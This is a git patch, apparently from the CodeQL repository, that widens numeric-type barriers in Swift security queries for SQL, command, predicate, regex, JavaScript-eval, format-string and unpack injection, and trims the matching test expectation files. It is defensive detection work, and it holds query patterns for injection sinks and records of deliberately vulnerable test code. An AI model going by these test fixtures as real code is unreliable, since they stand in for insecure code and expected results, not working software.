rncryptor.swift:67:131:67:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:68:133:68:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:68:133:68:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:69:106:69:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:69:106:69:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:70:106:70:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:106:70:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:70:131:70:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:131:70:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:71:133:71:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:71:133:71:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:72:106:72:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:72:106:72:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:74:127:74:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:127:74:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:74:152:74:152 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:152:74:152 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:75:154:75:154 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:75:154:75:154 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:76:127:76:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:76:127:76:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:77:135:77:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:135:77:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:77:160:77:160 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:160:77:160 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:78:162:78:162 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:78:162:78:162 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:79:135:79:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:79:135:79:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | | test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | | test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | From e589b1fcd059bca1c7f075b4722a610000d25caa Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 17:37:43 +0000 Subject: [PATCH 0702/1267] Swift: Fix query barriers. --- .../security/CommandInjectionExtensions.qll | 2 +- .../security/PredicateInjectionExtensions.qll | 2 +- .../swift/security/SqlInjectionExtensions.qll | 2 +- .../UncontrolledFormatStringExtensions.qll | 2 +- .../swift/security/UnsafeJsEvalExtensions.qll | 2 +- .../swift/security/UnsafeUnpackExtensions.qll | 2 +- .../regex/RegexInjectionExtensions.qll | 2 +- .../Security/CWE-089/SqlInjection.expected | 14 ----------- .../Security/CWE-094/UnsafeJsEval.expected | 23 ------------------- .../CWE-134/UncontrolledFormatString.expected | 21 ----------------- 10 files changed, 7 insertions(+), 65 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll index b1fd734440b..55391bd3378 100644 --- a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll @@ -63,6 +63,6 @@ private class CommandInjectionSinks extends SinkModelCsv { private class CommandInjectionDefaultBarrier extends CommandInjectionBarrier { CommandInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll index 9e5a8a8e57b..1ff8b97a281 100644 --- a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll @@ -46,6 +46,6 @@ private class PredicateInjectionSinkCsv extends SinkModelCsv { private class PredicateInjectionDefaultBarrier extends PredicateInjectionBarrier { PredicateInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll index 1437e67dc21..0ecc24a178e 100644 --- a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll @@ -190,6 +190,6 @@ private class DefaultSqlInjectionSink extends SqlInjectionSink { private class SqlInjectionDefaultBarrier extends SqlInjectionBarrier { SqlInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll index b114f72f215..eb44f6894b9 100644 --- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll @@ -94,6 +94,6 @@ class HeuristicUncontrolledFormatStringSink extends UncontrolledFormatStringSink private class UncontrolledFormatStringDefaultBarrier extends UncontrolledFormatStringBarrier { UncontrolledFormatStringDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll index 3eb65e6460f..923449f4d73 100644 --- a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll @@ -127,6 +127,6 @@ private class DefaultUnsafeJsEvalSink extends UnsafeJsEvalSink { private class UnsafeJsEvalDefaultBarrier extends UnsafeJsEvalBarrier { UnsafeJsEvalDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll index c102aa40a1e..1df4a06417b 100644 --- a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll @@ -73,6 +73,6 @@ private class UnsafeUnpackAdditionalDataFlowStep extends UnsafeUnpackAdditionalF private class UnsafeUnpackDefaultBarrier extends UnsafeUnpackBarrier { UnsafeUnpackDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll index d95bcc212bf..09c4641cbf0 100644 --- a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll @@ -64,6 +64,6 @@ private class RegexInjectionSinks extends SinkModelCsv { private class RegexInjectionDefaultBarrier extends RegexInjectionBarrier { RegexInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric" + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 9824b5c8e17..36ebcd04a6e 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -82,7 +82,6 @@ edges | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | provenance | | -| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:63:25:63:25 | remoteString | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | provenance | | @@ -98,8 +97,6 @@ edges | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | provenance | | -| SQLite.swift:63:21:63:37 | call to Self.init(_:) | SQLite.swift:77:17:77:17 | safeQuery2 | provenance | | -| SQLite.swift:63:25:63:25 | remoteString | SQLite.swift:63:21:63:37 | call to Self.init(_:) | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | provenance | | @@ -107,7 +104,6 @@ edges | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | provenance | | | other.swift:54:31:54:31 | remoteString | other.swift:54:14:54:43 | call to NSString.init(string:) | provenance | | -| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:123:25:123:25 | remoteString | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | provenance | | @@ -115,8 +111,6 @@ edges | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | provenance | | -| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | provenance | | -| sqlite3_c_api.swift:123:25:123:25 | remoteString | sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | provenance | | | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | provenance | | | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | sqlite3_c_api.swift:190:2:190:2 | data | provenance | | | sqlite3_c_api.swift:190:2:190:2 | data | sqlite3_c_api.swift:190:21:190:21 | [post] buffer | provenance | | @@ -220,12 +214,9 @@ nodes | GRDB.swift:350:69:350:69 | remoteString | semmle.label | remoteString | | GRDB.swift:351:84:351:84 | remoteString | semmle.label | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | -| SQLite.swift:63:21:63:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| SQLite.swift:63:25:63:25 | remoteString | semmle.label | remoteString | | SQLite.swift:73:17:73:17 | unsafeQuery1 | semmle.label | unsafeQuery1 | | SQLite.swift:74:17:74:17 | unsafeQuery2 | semmle.label | unsafeQuery2 | | SQLite.swift:75:17:75:17 | unsafeQuery3 | semmle.label | unsafeQuery3 | -| SQLite.swift:77:17:77:17 | safeQuery2 | semmle.label | safeQuery2 | | SQLite.swift:83:29:83:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | SQLite.swift:95:32:95:32 | remoteString | semmle.label | remoteString | | SQLite.swift:100:29:100:29 | unsafeQuery1 | semmle.label | unsafeQuery1 | @@ -247,12 +238,9 @@ nodes | other.swift:55:14:55:14 | remoteString | semmle.label | remoteString | | other.swift:57:16:57:16 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | -| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| sqlite3_c_api.swift:123:25:123:25 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | semmle.label | unsafeQuery1 | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | semmle.label | unsafeQuery2 | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | semmle.label | unsafeQuery3 | -| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | semmle.label | safeQuery2 | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | @@ -351,7 +339,6 @@ subpaths | SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:77:17:77:17 | safeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:77:17:77:17 | safeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | @@ -373,7 +360,6 @@ subpaths | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected index 64a65dd1a54..cfd68d818ef 100644 --- a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected +++ b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected @@ -30,17 +30,6 @@ edges | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | | UnsafeJsEval.swift:214:24:214:24 | remoteData | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:265:13:265:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:268:13:268:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:276:13:276:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:279:13:279:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | -| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | provenance | | -| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | provenance | | -| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | provenance | | -| UnsafeJsEval.swift:217:35:217:63 | try! ... | UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | provenance | | -| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:217:35:217:63 | try! ... | provenance | | | UnsafeJsEval.swift:265:13:265:13 | string | UnsafeJsEval.swift:266:43:266:43 | string | provenance | | | UnsafeJsEval.swift:266:43:266:43 | string | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | provenance | | | UnsafeJsEval.swift:268:13:268:13 | string | UnsafeJsEval.swift:269:43:269:43 | string | provenance | | @@ -74,12 +63,6 @@ nodes | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | semmle.label | call to String.init(decoding:as:) | | UnsafeJsEval.swift:214:24:214:24 | remoteData | semmle.label | remoteData | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | semmle.label | ... .+(_:_:) ... | -| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | semmle.label | ... ??(_:_:) ... | -| UnsafeJsEval.swift:217:35:217:63 | try! ... | semmle.label | try! ... | -| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:265:13:265:13 | string | semmle.label | string | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | semmle.label | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | | UnsafeJsEval.swift:266:43:266:43 | string | semmle.label | string | @@ -114,30 +97,24 @@ subpaths | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | 